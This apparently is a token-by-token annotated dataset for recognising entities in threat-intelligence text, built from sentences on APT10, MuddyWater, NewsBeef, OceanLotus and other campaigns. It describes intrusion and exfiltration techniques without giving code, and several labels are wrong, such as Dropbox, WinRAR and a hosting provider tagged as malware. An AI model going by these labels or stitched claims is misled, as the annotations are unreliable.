+Russian O +state-linked O +threat O +actor O +CyberBerkut S-APT +. O +KHRAT S-FILE +is O +a O +backdoor B-MAL +trojan E-MAL +purported O +to O +be O +used O +with O +the O +China-linked S-LOC +cyberespionage O +group O +DragonOK S-APT +. 
O +In O +early B-TIME +2018 E-TIME +, O +Rapid7 S-SECTEAM +identified O +that O +APT10 S-APT +compromised O +an O +apparel B-IDTY +company E-IDTY +, O +based O +upon O +detections O +and O +intelligence O +gathered O +from O +the O +U.S.-based O +law B-IDTY +firm E-IDTY +breach O +. O +The O +attacker S-APT +gained O +access O +to O +the O +victim’s O +internet-accessible O +Citrix S-MAL +systems O +and O +authenticated O +to O +them O +from O +networks O +associated O +with O +low-cost O +VPN S-TOOL +providers O +owned O +by O +VPN S-TOOL +Consumer O +Network O +. O +Rapid7 S-SECTEAM +again O +observed O +APT10 S-APT +dropping O +payloads O +named O +ccSEUPDT.exe.” O +The O +attackers O +used O +identical O +TTPs O +for O +executing O +malware O +and O +Mimikatz S-MAL +as O +observed O +before O +, O +by O +using O +DLL S-TOOL +sideloading O +with O +known O +good O +binaries O +that O +had O +DLL S-TOOL +search O +order O +path O +issues O +. O +Rapid7 S-SECTEAM +reviewed O +malware O +discovered O +in O +the O +victim’s O +environment O +and O +found O +implants O +that O +used O +Dropbox S-FILE +as O +the O +C2 S-TOOL +. O +The O +attackers S-APT +used O +the O +same O +method O +of O +lateral O +movement O +by O +mounting O +the O +remote O +drive O +on O +a O +system O +, O +copying O +1.bat S-MAL +to O +it O +, O +using O +task O +scheduler O +to O +execute O +the O +batch O +script O +, O +and O +finally O +, O +deleting O +the O +batch O +script O +. O +APT10 S-APT +used O +the O +same O +method O +of O +lateral O +movement O +by O +mounting S-ACT +the O +remote O +drive O +on O +a O +system O +, O +copying O +1.bat O +to O +it O +, O +using O +task B-ACT +scheduler E-ACT +to O +execute O +the O +batch O +script O +, O +and O +finally O +, O +deleting O +the O +batch O +script O +. 
O +For O +Exfiltration S-ACT +of O +stolen O +data O +, O +APT10 S-APT +used O +WinRAR S-MAL +and O +renamed O +rar.exe” S-MAL +to O +r.exe” S-MAL +to O +create O +archives O +, O +upload O +them O +with O +curl.exe” O +(renamed O +to O +c.exe”) O +, O +and O +again O +, O +use O +the O +cloud O +storage O +provider O +Dropbox S-MAL +. O +Rapid7 S-SECTEAM +discovered O +that O +additional O +data O +was O +placed O +into O +the O +Dropbox S-TOOL +accounts O +under O +control O +of O +the O +attacker S-APT +during O +the O +compromise O +and O +was O +able O +to O +attribute B-ACT +data E-ACT +that O +was O +placed O +into O +it O +as O +being O +owned O +by O +Visma O +. O +Once O +on O +the O +Visma B-MAL +network E-MAL +, O +APT10 S-APT +attackers O +used O +the O +Microsoft S-IDTY +BITSAdmin S-MAL +CLI O +tool O +to O +copy O +malicious O +tools O +from O +a O +suspected O +attacker-controlled O +C2 S-TOOL +hosted O +on O +173.254.236[.]158 O +to O +the O +\ProgramData\temp\ O +directory O +on O +the O +infected O +host O +. O +Rapid7 S-SECTEAM +then O +provided O +a O +breach O +notification O +to O +Visma O +to O +alert O +them O +to O +this O +compromise O +in O +September S-TIME +2018 S-TIME +. O +We O +believe O +APT10 S-APT +is O +the O +most O +significant O +known O +Chinese S-LOC +state-sponsored O +cyber O +threat O +to O +global O +corporations O +. O +APT10's S-APT +unprecedented O +campaign O +against O +MSPs S-IDTY +, O +alleged O +to O +have O +included O +some O +of O +the O +largest O +MSPs O +in O +the O +world O +, O +in O +order O +to O +conduct O +secondary O +attacks O +against O +their O +clients O +, O +grants O +the O +Chinese O +state O +the O +ability O +to O +potentially O +access O +the O +networks O +of O +hundreds O +(if O +not O +thousands) O +of O +corporations O +around O +the O +world O +. 
O +This O +campaign O +brings O +to O +light O +further O +evidence O +supporting O +the O +assertions O +made O +by O +the O +Five O +Eyes O +nations O +, O +led O +by O +the O +U.S. O +Department O +of O +Justice O +indictment O +against O +APT10 S-APT +actors O +outlining O +the O +unprecedented O +scale O +of O +economic S-IDTY +cyberespionage O +being O +conducted O +by O +the O +Chinese O +Ministry O +of O +State O +Security O +. O +This O +report O +, O +alongside O +the O +plethora O +of O +other O +reporting O +on O +APT10 S-APT +operations O +, O +acutely O +highlights S-ACT +the O +vulnerability O +of O +organizational O +supply O +chains O +. O + +The O +analyzed O +RTF O +files O +share O +the O +same O +object O +dimension O +(objw2180\objh300) O +used O +to O +track O +the O +RTF O +weaponizer O +in O +our O +previous O +report O +, O +however O +, O +the O +sample S-FILE +was O +not O +exploiting O +CVE-2017-11882 S-VULID +or O +CVE-2018-0802 S-VULID +. O +After O +further O +analysis O +, O +it O +was O +discovered O +that O +the O +RTF B-FILE +files E-FILE +were O +exploiting O +the O +CVE-2018-0798 S-VULID +vulnerability O +in O +Microsoft S-IDTY +’s O +Equation B-TOOL +Editor E-TOOL +( O +EQNEDT32 S-TOOL +) O +. O + +Anomali S-SECTEAM +Researchers O +were O +able O +to O +identify O +multiple O +samples O +of O +malicious O +RTF O +documents O +ITW S-FILE +using O +the O +same O +exploit S-VULNAME +for O +CVE-2018-0798 S-VULID +. O +The O +earliest O +use O +of O +the O +exploit S-VULNAME +ITW S-FILE +we O +were O +able O +to O +identify O +and O +confirm O +is O +a O +sample O +e228045ef57fb8cc1226b62ada7eee9b S-MD5 +dating O +back O +to O +October B-TIME +2018 E-TIME +( O +VirusTotal S-TOOL +submission O +of O +2018-10-29 S-TIME +) O +with O +the O +RTF S-TOOL +creation O +time O +2018-10-23 S-TIME +. 
O + +CVE-2018-0798 S-VULID +is O +an O +RCE O +vulnerability O +, O +a O +stack O +buffer O +overflow O +that O +can O +be O +exploited O +by O +a O +threat O +actor O +to O +perform O +stack O +corruption O +. O +As O +observed O +previously O +with O +CVE-2017-11882 S-VULID +and O +CVE-2018-0802 S-VULID +, O +the O +weaponizer S-MAL +was O +used O +exclusively O +by O +Chinese O +Cyber B-ACT +Espionage E-ACT +actors S-APT +for O +approximately O +one O +year O +December B-TIME +2017 E-TIME +through O +December B-TIME +2018 E-TIME +, O +after O +which O +cybercrime O +actors O +began O +to O +incorporate O +it O +in O +their O +malicious O +activity O +. O +Upon O +decrypting O +and O +executing O +, O +it O +drops O +two O +additional O +files O +wsc_proxy.exe” S-FILE +(legitimate O +Avast O +executable) O +and O +a O +malicious O +DLL S-TOOL +wsc.dll” S-FILE +in O +the O +%TEMP% O +folder O +. O +However O +, O +Beginning O +on O +25 O +June O +2019 O +, O +we O +started O +observing O +multiple O +commodity O +campaigns O +Mostly O +dropping O +AsyncRAT S-FILE +using O +the O +updated O +RTF O +weaponizer O +with O +the O +same O +exploit S-VULNAME +( O +CVE-2018-0798 S-VULID +) O +. O +Analysis O +of O +the O +Royal O +Road O +weaponizer O +has O +resulted O +in O +the O +discovery O +that O +multiple O +Chinese O +threat B-APT +groups E-APT +started O +utilizing O +CVE-2018-0798 S-VULID +in O +their O +RTF B-MAL +weaponizer E-MAL +. O +These O +findings O +also O +suggest O +that O +the O +threat B-APT +groups E-APT +have O +robust O +exploit S-VULNAME +developing O +capabilities O +because O +CVE-2018-0798 S-VULID +is O +not O +widely O +reported O +on O +and O +it O +is O +typically O +not O +incorporated O +into O +publicly O +available O +weaponizers O +. O +In O +addition O +, O +a O +current O +ANY.RUN S-FILE +playback O +of O +our O +observed O +Elise S-FILE +infection O +is O +also O +available O +. 
O +Upon O +opening O +of O +the O +MS O +Word S-TOOL +document O +, O +our O +embedded O +file O +exploits O +CVE-2017-11882 S-VULID +to O +drop O +a O +malicious O +fake O +Norton O +Security O +Shell O +Extension O +module O +, O +'NavShExt.dll' S-FILE +, O +which O +is O +then O +injected O +into O +iexplore.exe S-FILE +to O +install O +the O +backdoor O +, O +begin O +collection O +, O +and O +activate O +command O +and O +control O +. O +Moving O +through O +the O +infection O +process O +, O +NetWitness O +Endpoint O +detects O +the O +initial O +exploit S-VULNAME +CVE-2017-1182 S-VULID +in O +action O +as O +the O +Microsoft B-FILE +Equation I-FILE +Editor E-FILE +, O +'EQNEDT32.exe' S-FILE +, O +scores O +high O +for O +potentially O +malicious O +activity O +. O +Most O +recently O +though O +, O +a O +new O +campaign O +, O +targeting O +Belarus S-LOC +, O +Turkey S-LOC +and O +Ukraine S-LOC +, O +has O +emerged O +that O +caught O +the O +attention O +of O +Check B-SECTEAM +Point E-SECTEAM +researchers O +. O +The O +well-crafted O +and O +socially O +engineered O +malicious O +documents O +then O +become O +the O +first O +stage O +of O +a O +long O +and O +mainly O +fileless O +infection O +chain O +that O +eventually O +delivers O +POWERSTATS S-FILE +, O +a O +signature O +PowerShell B-FILE +backdoor E-FILE +of O +this O +threat O +group O +. O +This O +powerful O +backdoor S-FILE +can O +receive O +commands O +from O +the O +attackers O +, O +enabling O +it O +to O +exfiltrate O +files O +from O +the O +system O +it O +is O +running O +on O +, O +execute O +additional O +scripts O +, O +delete O +files O +, O +and O +more O +. O +If O +the O +macros O +in O +SPK B-FILE +KANUN E-FILE +DEĞİŞİKLİĞİ O +GİB O +GÖRÜŞÜ.doc” O +are O +enabled O +, O +an O +embedded O +payload O +is O +decoded O +and O +saved O +in O +the O +%APPDATA% O +directory O +with O +the O +name O +CiscoAny.exe” S-FILE +. 
O +INF B-MAL +files E-MAL +have O +been O +used O +in O +the O +past O +by O +MuddyWater S-APT +, O +although O +they O +were O +launched O +using O +Advpack.dll S-MAL +and O +not O +IEAdvpack.dll S-MAL +. O +In O +addition O +, O +by O +using O +VBA2Graph S-FILE +, O +we O +were O +able O +to O +visualize O +the O +VBA O +call O +graph O +in O +the O +macros O +of O +each O +document O +. O +Although O +it O +has O +focused O +most O +of O +its O +efforts O +on O +the O +Middle B-LOC +East E-LOC +region O +, O +the O +political O +affiliations O +, O +motives O +and O +purposes O +behind O +MuddyWater’s S-APT +attacks O +are O +not O +very O +well- O +defined O +, O +thus O +earning O +it O +its O +name O +. O +In O +the O +past O +, O +countries O +such O +as O +Saudi B-LOC +Arabia E-LOC +, O +the O +UAE S-LOC +and O +Turkey S-LOC +have O +been O +a O +MuddyWater's S-APT +main O +target O +, O +but O +the O +campaigns O +have O +also O +reached O +a O +much O +wider O +audience O +, O +making O +their O +ACT O +to O +victims O +in O +countries O +such O +as O +Belarus S-LOC +and O +Ukraine S-LOC +. O +MuddyWater S-APT +target O +groups O +across O +Middle B-LOC +East E-LOC +and O +Central B-LOC +Asia E-LOC +, O +primarily O +using O +spear B-ACT +phishing E-ACT +emails S-TOOL +with O +malicious O +attachments O +. O +Most O +recently O +MuddyWater S-APT +were O +connected O +to O +a O +campaign O +in O +March O +that O +targeted O +organizations O +in O +Turkey S-LOC +, O +Pakistan S-LOC +, O +and O +Tajikistan S-LOC +. O +The O +group O +has O +been O +quite O +visible O +since O +the O +initial O +2017 S-TIME +Malwarebytes O +report O +on O +their O +elaborate O +espionage O +attack O +against O +the O +Saudi B-LOC +Arabian E-LOC +government O +. O +Our O +analysis O +revealed O +that O +they O +drop O +a O +new O +backdoor O +, O +which O +is O +written O +in O +PowerShell S-TOOL +as O +MuddyWater’s S-APT +known O +POWERSTATS B-MAL +backdoor E-MAL +. 
O +We O +assume O +that O +RunPow O +stands O +for O +run O +PowerShell S-TOOL +, O +” O +and O +triggers O +the O +PowerShell S-TOOL +code O +embedded O +inside O +the O +.dll B-FILE +file E-FILE +. O +This O +backdoor S-MAL +has O +some O +features O +similar O +to O +a O +previously O +discovered O +version O +of O +the O +Muddywater S-APT +backdoor O +. O +Based O +on O +our O +analysis O +, O +we O +can O +confirm O +that O +MuddyWater S-APT +target O +Turkish B-IDTY +government I-IDTY +organizations E-IDTY +related O +to O +the O +finance S-IDTY +and O +energy S-IDTY +sectors O +. O +This O +is O +yet O +another O +similarity O +with O +previous O +MuddyWater S-APT +campaigns O +, O +which O +were O +known O +to O +have O +targeted O +multiple O +Turkish S-LOC +government O +entities O +. O +The O +main O +delivery O +method O +of O +this O +type O +of O +backdoor S-FILE +is O +spear S-ACT +phishing S-ACT +emails S-TOOL +or O +spam S-ACT +that O +uses O +social O +engineering O +to O +manipulate O +targets O +into O +enabling O +malicious O +documents O +. O +Trend B-SECTEAM +Micro™ E-SECTEAM +Deep O +Discovery™ O +provides O +detection O +, O +in-depth O +analysis O +, O +and O +proactive O +response O +to O +today’s O +stealthy O +malware O +, O +and O +targeted O +attacks S-APT +in O +real O +time O +. O +MuddyWater S-APT +first O +surfaced O +in O +2017 S-TIME +. O +First O +stage O +infections O +and O +graphical O +decoys O +have O +been O +described O +by O +multiple O +sources O +, O +including O +in O +our O +previous O +research O +MuddyWater S-APT +expands B-ACT +operations E-ACT +. O +MuddyWater S-APT +compiles O +various O +offensive O +Python S-MAL +scripts S-MAL +. O +This O +includes O +Python S-TOOL +scripts O +. O +Usually O +, O +the O +Stageless B-FILE +Meterpreter E-FILE +has O +the O +Ext_server_stdapi.x64.dll” S-FILE +, O +Ext_server_extapi.x64.dll” S-FILE +, O +and O +Ext_server_espia.x64.dll” S-FILE +extensions O +. 
O +The O +January B-TIME +2017 E-TIME +report O +followed O +up O +on O +other O +private O +reports O +published O +on O +the O +group’s O +BeEF-related S-APT +activity O +in O +2015 S-TIME +and O +2016 S-TIME +. O +Previous O +analysis O +of O +the O +NewsBeef S-APT +APT O +indicates O +that O +the O +group O +focuses O +on O +Saudi B-LOC +Arabian E-LOC +and O +Western S-LOC +targets O +, O +and O +lacks O +advanced O +offensive O +technology O +development O +capabilities O +. O +However O +, O +in O +the O +summer O +of O +2016 S-TIME +, O +NewsBeef S-APT +deployed O +a O +new O +toolset O +that O +includes O +macro-enabled B-MAL +Office I-MAL +documents E-MAL +, O +PowerSploit S-MAL +, O +and O +the O +Pupy B-MAL +backdoor E-MAL +. O +The O +most O +recent O +NewsBeef S-APT +campaign O +uses O +this O +toolset O +in O +conjunction O +with O +spearphishing S-ACT +emails S-TOOL +, O +links O +sent O +over O +social B-ACT +media/standalone E-ACT +private B-ACT +messaging I-ACT +applications E-ACT +, O +and O +watering B-ACT +hole E-ACT +attacks O +that O +leverage O +compromised O +high-profile O +websites O +some O +belonging O +to O +the O +SA O +government O +. O +The O +NewsBeef S-APT +actor O +deployed O +a O +new O +toolset O +in O +a O +campaign O +that O +focused O +primarily O +on O +Saudi B-LOC +Arabian E-LOC +targets O +. O +NewsBeef S-APT +continues O +to O +deploy O +malicious O +macro-enabled O +Office O +documents O +, O +poisoned O +legitimate O +Flash S-MAL +and O +Chrome B-MAL +installers E-MAL +, O +PowerSploit S-MAL +, O +and O +Pupy B-MAL +tools E-MAL +. O +The O +NewsBeef S-APT +campaign O +is O +divided O +into O +two O +main O +attack O +vectors O +, O +spearphishing S-ACT +and O +strategic B-ACT +web I-ACT +compromise E-ACT +watering B-ACT +hole E-ACT +attacks O +. 
O +On O +December S-TIME +25 S-TIME +, O +2016 S-TIME +, O +the O +NewsBeef S-APT +APT O +stood O +up O +a O +server O +to O +host O +a O +new O +set O +of O +Microsoft S-IDTY +Office O +documents O +(maintaining O +malicious O +macros O +and O +PowerShell S-TOOL +scripts) O +to O +support O +its O +spear-phishing S-ACT +operations O +. O +These O +compromised O +servers O +include O +Saudi B-LOC +Arabian E-LOC +government O +servers O +and O +other O +high-value O +organizational O +identities O +relevant O +to O +NewsBeef's S-APT +targets O +. O +However O +, O +Kaspersky S-SECTEAM +Security O +Network O +records O +also O +contain O +links O +that O +victims O +clicked O +from O +the O +Outlook S-TOOL +web O +client O +outlook.live.com” S-FILE +as O +well O +as O +attachments O +arriving O +through O +the O +Outlook S-TOOL +desktop O +application O +. O +Interestingly O +, O +NewsBeef S-APT +set O +up O +its O +server O +using O +the O +hosting O +provider O +Choopa S-MAL +, O +LLC S-MAL +, O +US” S-MAL +, O +the O +same O +hosting O +provider O +that O +the O +group O +used O +in O +attacks O +over O +the O +summer B-TIME +of I-TIME +2016 E-TIME +. O +NTG’s S-IDTY +IT O +focus O +and O +client O +list O +likely O +aided O +NewsBeef’s S-APT +delivery O +of O +malicious O +PowerShell-enabled O +Office O +documents O +and O +poisoned O +installers O +. O +In O +other O +schemes O +, O +NewsBeef S-APT +sent O +macro-enabled O +Office O +attachments O +from O +spoofed O +law O +firm O +identities O +or O +other O +relevant O +service O +providers O +to O +targets O +in O +SA S-LOC +. O +The O +law O +firm O +in O +this O +scheme O +is O +based O +in O +the O +United B-LOC +Kingdom E-LOC +and O +is O +the O +sole O +location O +for O +targets S-APT +outside O +of O +SA S-LOC +for O +this O +campaign O +. 
O +Starting O +in O +October B-TIME +2016 E-TIME +, O +NewsBeef S-APT +compromised O +a O +set O +of O +legitimate O +servers O +(shown O +below) O +, O +and O +injected O +JavaScript O +to O +redirect O +visitors O +to O +http://analytics-google.org:69/Check.aspx O +. O +For O +example O +, O +on O +a O +Saudi S-LOC +government O +website O +, O +the O +NewsBeef S-APT +APT O +delivered O +packed O +JavaScript O +into O +the O +bottom O +of O +a O +referenced O +script O +that O +is O +included O +in O +every O +page O +served O +from O +the O +site O +the O +packed O +and O +unpacked O +JavaScript S-MAL +is O +shown O +below O +. O +The O +JavaScript S-FILE +forces O +visiting O +web O +browsers O +to O +collect O +and O +send O +(via O +a O +POST O +request) O +web O +browser O +, O +browser O +version O +, O +country O +of O +origin O +, O +and O +IP S-PROT +address O +data O +to O +the O +attacker O +controlled O +server O +jquerycodedownload.live/check.aspx” O +. O +A O +high O +volume O +of O +redirections S-APT +from O +the O +compromised O +site O +continues O +into O +mid-January S-TIME +2017 S-TIME +. O +However O +, O +as O +this O +recent O +campaign O +indicates O +, O +the O +NewsBeef S-APT +APT O +appears O +to O +have O +shifted O +its O +intrusion O +toolset O +aACT O +from O +BeEF O +and O +towards O +macro-enabled O +malicious O +Office B-MAL +documents E-MAL +, O +PowerSploit S-MAL +, O +and O +Pupy S-MAL +. O +Despite O +this O +shift O +in O +toolset O +, O +the O +group O +still O +relies O +on O +old O +infrastructure O +as O +evidenced O +by O +their O +reuse O +of O +servers O +hosted O +by O +the O +service O +providers O +Choopa O +and O +Atlantic.net O +. O +Its O +attack B-ACT +activities E-ACT +can O +be O +traced O +back O +to O +April S-TIME +2012 S-TIME +. 
O +The O +OceanLotus S-APT +reflects S-ACT +a O +very O +strong O +confrontational O +ability O +and O +willing O +to O +attack O +by O +keep O +evolving O +their O +techniques O +. O +These O +APT O +attacks O +and O +adopting B-IDTY +confrontation I-IDTY +measures E-IDTY +will O +exist O +for O +a O +long O +time O +. O +OceanLotus’ S-APT +targets O +are O +global S-LOC +. O +OceanLotus S-APT +have O +been O +actively O +using O +since O +at O +least O +early B-TIME +2018 E-TIME +. O +OceanLotus S-APT +malware O +family O +samples O +used O +no O +earlier O +than O +2017 S-TIME +. O +we O +identified O +two O +methods O +to O +deliver O +the O +KerrDown S-FILE +downloader O +to O +targets O +. O +The O +link O +to O +the O +final O +payload O +of O +KerrDown S-FILE +was O +still O +active O +during O +the O +time O +of O +analysis O +and O +hence O +we O +were O +able O +to O +download O +a O +copy O +which O +turned O +out O +to O +be O +a O +variant O +of O +Cobalt O +Strike O +Beacon O +. O +While O +investigating O +KerrDown S-FILE +we O +found O +multiple O +RAR O +files O +containing O +a O +variant O +of O +the O +malware O +. O +Therefore O +, O +it O +is O +clear O +that O +the O +OceanLotus S-APT +group O +works O +during O +weekdays S-TIME +and O +takes O +a O +break O +during O +the O +weekends O +. O +The O +group O +was O +first O +revealed O +and O +named O +by O +SkyEye O +Team O +in O +May B-TIME +2015 E-TIME +. O +OceanLotus's S-APT +targets O +include O +China's O +maritime B-IDTY +institutions E-IDTY +, O +maritime B-IDTY +construction E-IDTY +, O +scientific B-IDTY +research I-IDTY +institutes E-IDTY +and O +shipping B-IDTY +enterprises E-IDTY +. 
O + +RedDrip B-SECTEAM +Team E-SECTEAM +(formerly O +SkyEye B-SECTEAM +Team E-SECTEAM +) O +has O +been O +to O +OceanLotus S-APT +to O +keep O +track O +of O +high O +strength O +, O +groupactivity O +, O +found O +it O +in O +the O +near O +future O +to O +Indochinese O +Peninsula O +countries O +since O +2019 S-TIME +On O +April B-TIME +1 E-TIME +, O +2019 O +, O +RedDrip S-SECTEAM +discovered O +a O +Vietnamese O +file O +name O +Hop O +dong O +sungroup.rar O +in O +the O +process O +of O +daily O +monitoring O +the O +attack O +activities O +of O +the O +OceanLotus S-APT +. O +COCCOC S-APT +is O +a O +Vietnam O +was O +founded O +in O +2013 S-TIME +. O +In O +fact O +, O +according O +to O +reports O +of O +various O +security O +vendors O +, O +OceanLotus S-APT +also O +attacked O +several O +countries O +, O +including O +Cambodia S-LOC +, O +Thailand S-LOC +, O +Laos S-LOC +, O +even O +some O +victims O +in O +Vietnam S-LOC +, O +like O +opinion O +leaders O +, O +media S-IDTY +, O +real B-IDTY +estate I-IDTY +companies E-IDTY +, O +foreign B-IDTY +enterprises E-IDTY +and O +banks S-IDTY +. O +Unlike O +the O +2016 S-TIME +variants O +of O +Ratsnif S-APT +that O +stored O +all O +packets O +to O +a O +PCAP O +file O +. O +these O +threat O +actors O +targeted O +a O +number O +of O +government O +agencies O +threat O +actors S-APT +targeted O +a O +number O +of O +government S-IDTY +agencies S-IDTY +in O +East O +Asia O +. O +Attackers S-APT +relied O +on O +Microsoft S-IDTY +Equation O +Editor O +exploit S-VULNAME +CVE-2018-0798 S-VULID +to O +deliver O +a O +custom O +malware O +that O +Proofpoint O +researchers O +have O +dubbed O +Cotx O +RAT. O +Maudi S-APT +Surveillance O +Operation O +which O +was O +previously O +reported O +in O +2013 S-TIME +. O +specifically O +CVE-2018-0798 S-VULID +, O +before O +downloading O +subsequent O +payloads O +. O +The O +dropped O +PE S-MAL +file O +has O +the O +distinctive O +file O +name O +8.t” S-FILE +. 
O +The O +last O +process O +is O +utilized O +as O +part O +of O +the O +loading O +process O +for O +Cotx B-APT +RAT E-APT +and O +involves O +the O +legitimate O +Symantec S-SECTEAM +binary O +noted O +above O +. O +These O +conflicts O +have O +even O +resulted O +in O +Haftar S-APT +leading O +an O +attack O +on O +the O +capital O +city O +in O +April S-TIME +. O +The O +attackers S-APT +have O +targeted O +a O +large O +number O +of O +organizations O +globally O +since O +early O +2017 S-TIME +. O +Attackers S-APT +were O +initially O +discovered O +while O +investigating O +a O +phishing B-ACT +attack E-ACT +that O +targeted O +political S-IDTY +figures O +in O +the O +MENA S-LOC +region O +. O +Group's S-APT +targets O +include O +high-profile O +entities O +such O +as O +parliaments S-IDTY +, O +senates S-IDTY +, O +top B-IDTY +state I-IDTY +offices E-IDTY +and O +officials S-IDTY +, O +political B-IDTY +science I-IDTY +scholars E-IDTY +, O +military S-IDTY +and O +intelligence B-IDTY +agencies E-IDTY +, O +ministries S-IDTY +, O +media B-IDTY +outlets E-IDTY +, O +research B-IDTY +centers E-IDTY +, O +election B-IDTY +commissions E-IDTY +, O +Olympic B-IDTY +organizations E-IDTY +, O +large O +trading B-IDTY +companies E-IDTY +, O +and O +other O +unknown B-IDTY +entities E-IDTY +. O +Cisco B-SECTEAM +Talos E-SECTEAM +recently O +published O +a O +blogpost O +describing O +targeted O +attacks O +in O +the O +Middle B-LOC +East E-LOC +region O +which O +we O +believe O +may O +be O +connected O +. O +Operation B-APT +Parliament E-APT +appears O +to O +be O +another O +symptom O +of O +escalating O +tensions O +in O +the O +Middle B-LOC +East E-LOC +region O +. O +The O +attackers S-APT +have O +taken O +great O +care O +to O +stay O +under O +the O +radar O +, O +imitating S-ACT +another O +attack O +group O +in O +the O +region O +. 
O +With O +deception O +and O +false O +flags O +increasingly O +being O +employed O +by O +threat O +actors S-APT +, O +attribution O +is O +a O +hard O +and O +complicated O +task O +that O +requires O +solid O +evidence O +, O +especially O +in O +complex O +regions O +such O +as O +the O +Middle B-LOC +East E-LOC +. O +The O +malware S-FILE +was O +first O +seen O +packed O +with O +VMProtect; O +when O +unpacked O +the O +sample O +didn’t O +show O +any O +similarities O +with O +previously O +known O +malware O +. O +The O +malware S-FILE +starts O +communicating O +with O +the O +C&C S-TOOL +server O +by O +sending O +basic O +information O +about O +the O +infected O +machine O +. O +The O +malware S-FILE +basically O +provides O +a O +remote O +CMD/PowerShell S-MAL +terminal O +for O +the O +attackers S-APT +, O +enabling O +them O +to O +execute O +scripts/commands O +and O +receive O +the O +results O +via O +HTTP S-PROT +requests O +. O +What O +lied O +beneath O +this O +facade O +was O +a O +well-engineered O +campaign O +of O +phishing E-ACT +attacks O +designed O +to O +steal O +credentials O +and O +spy O +on O +the O +activity O +of O +dozens O +of O +journalists O +, O +human O +rights O +defenders O +, O +trade O +unions O +and O +labour O +rights O +activists O +, O +many O +of O +whom O +are O +seemingly O +involved O +in O +the O +issue O +of O +migrants’ O +rights O +in O +Qatar O +and O +Nepal O +. O +We O +refer O +to O +this O +campaign O +and O +the O +associated O +actor O +as O +Operation B-APT +Kingphish E-APT +Malik” O +, O +in O +one O +of O +its O +written O +forms O +in O +Arabic S-LOC +, O +translates O +to O +King” O +. 
O +It O +is O +worth O +noting O +that O +in O +December B-TIME +2016 E-TIME +, O +Amnesty O +International O +published O +an O +investigation O +into O +another O +social O +engineering O +campaign O +perpetrated O +by O +a O +seemingly O +fake O +human O +rights O +organization O +known O +as O +Voiceless S-APT +Victims O +, O +which O +targeted O +international O +human O +rights O +and O +labour O +rights O +organizations O +campaigning O +on O +migrant O +workers’ O +rights O +in O +Qatar O +. O +It O +appears O +that O +the O +attackers S-APT +may O +have O +impersonated O +the O +identity O +of O +a O +real O +young O +woman O +and O +stole O +her O +pictures O +to O +construct O +the O +fake O +profile O +, O +along O +with O +a O +professional O +biography O +also O +stolen O +from O +yet O +another O +person O +. O +In O +the O +course O +of O +this O +email S-TOOL +correspondence O +, O +the O +attacker S-APT +— O +Safeena” O +— O +then O +sent O +what O +appeared O +to O +be O +invitations S-ACT +to O +access O +several O +documents O +on O +Google O +Drive O +. O +The O +attackers S-APT +were O +meticulous O +in O +making O +their O +phishing B-ACT +page E-ACT +as O +credible O +as O +possible O +. O +Among O +the O +targets O +of O +this O +campaign O +is O +the O +International O +Trade B-IDTY +Union I-IDTY +Confederation E-IDTY +. O + +Both O +in O +the O +attacks O +against O +ITUC S-IDTY +and O +in O +other O +occasions O +, O +Operation B-APT +Kingphish E-APT +approached O +selected O +targets O +over O +social B-MAL +media E-MAL +, O +prominently B-MAL +Facebook E-MAL +, O +and O +engaged O +in O +chat O +conversations O +with O +them O +on O +and O +off O +, O +sometimes O +over O +a O +period O +of O +several O +months O +. 
O +This O +time O +the O +document O +purported O +to O +be O +about O +the O +involvement O +of O +the O +Emir S-LOC +of O +Qatar S-LOC +in O +funding O +ISIS S-LOC +, O +which O +was O +seemingly O +copied O +from O +a O +website O +critical O +of O +Qatar O +. O +While O +there O +is O +a O +clear O +underlying O +Qatar S-LOC +migrant O +workers O +theme O +in O +Operation B-APT +Sheep E-APT +, O +it O +is O +also O +hypothetically O +possible O +that O +these O +attacks O +could O +have O +been O +perpetrated O +by O +a O +malicious O +actor O +affiliated O +to O +a O +different O +government O +with O +an O +interest O +in O +damaging O +the O +reputation O +of O +the O +State O +of O +Qatar S-LOC +. O +Dubbed O +‘Operation B-APT +Sheep’ E-APT +, O +this O +massive O +data O +stealing O +campaign O +is O +the O +first O +known O +campaign O +seen O +in O +the O +wild O +to O +exploit S-VULNAME +the O +Man-in-the-Disk S-VULNAME +vulnerability O +revealed O +by O +Check O +Point O +Research O +earlier O +last O +year O +. O +The O +SDK S-MAL +, O +named O +SWAnalytics S-FILE +is O +integrated O +into O +seemingly O +innocent O +Android S-OS +applications O +published B-ACT +on E-ACT +major O +3rd O +party O +Chinese O +app O +stores O +such O +as O +Tencent B-IDTY +MyApp E-IDTY +, O +Wandoujia S-IDTY +, O +Huawei B-IDTY +App I-IDTY +Store E-IDTY +, O +and O +Xiaomi B-IDTY +App I-IDTY +Store E-IDTY +. O +After O +app O +installation O +, O +whenever O +SWAnalytics S-FILE +senses O +victims O +opening O +up O +infected O +applications O +or O +rebooting O +their O +phones O +, O +it O +silently O +uploads O +their O +entire O +contacts O +list O +to O +Hangzhou O +Shun O +Wang O +Technologies O +controlled O +servers O +. O +In O +theory O +, O +Shun B-APT +Wang E-APT +Technologies O +could O +have O +collected O +a O +third O +of O +China’s S-LOC +population O +names O +and O +contact O +numbers O +if O +not O +more O +. 
O +With O +no O +clear O +declaration O +of O +usage O +from O +Shun B-APT +Wang E-APT +, O +nor O +proper O +regulatory O +supervision O +, O +such O +data O +could O +circulate O +into O +underground O +markets O +for O +further O +exploit S-VULNAME +, O +ranging O +from O +rogue O +marketing O +, O +targeted O +telephone O +scams O +or O +even O +friend O +referral O +program O +abuse O +during O +November’s O +Single’s O +Day O +and O +December’s O +Asian O +online O +shopping O +fest O +. O +This O +paper O +will O +cover O +the O +discovery O +of O +this O +campaign O +, O +dubbed O +‘Operation B-APT +Sheep’ E-APT +, O +and O +an O +analysis O +of O +SWAnalytics S-ACT +. O +In O +mid-September O +, O +an O +app O +named O +‘Network B-APT +Speed I-APT +Master’ E-APT +stood O +out O +on O +our O +radar O +with O +its O +rather O +unusual O +behavior O +patterns O +. O +This O +module S-FILE +monitors O +a O +wide O +range O +of O +device O +activities O +including O +application O +installation O +/ O +remove O +/ O +update O +, O +phone O +restart O +and O +battery O +charge O +. O +It O +turns O +out O +that O +contacts O +data O +isn’t O +the O +only O +unusual O +data O +SWAnalytics S-FILE +is O +interested O +in O +. O +With O +default O +settings O +, O +SWAnalytics S-FILE +will O +scan O +through O +an O +Android S-OS +device’s O +external O +storage O +, O +looking O +for O +directory O +tencent/MobileQQ/WebViewCheck” O +. O +From O +our O +first O +malicious B-FILE +sample E-FILE +encounter O +back O +in O +mid-September S-TIME +until O +now O +, O +we O +have O +observed O +12 O +infected O +applications O +, O +the O +majority O +of O +which O +are O +in O +the O +system O +utility O +category O +. O +By O +listing O 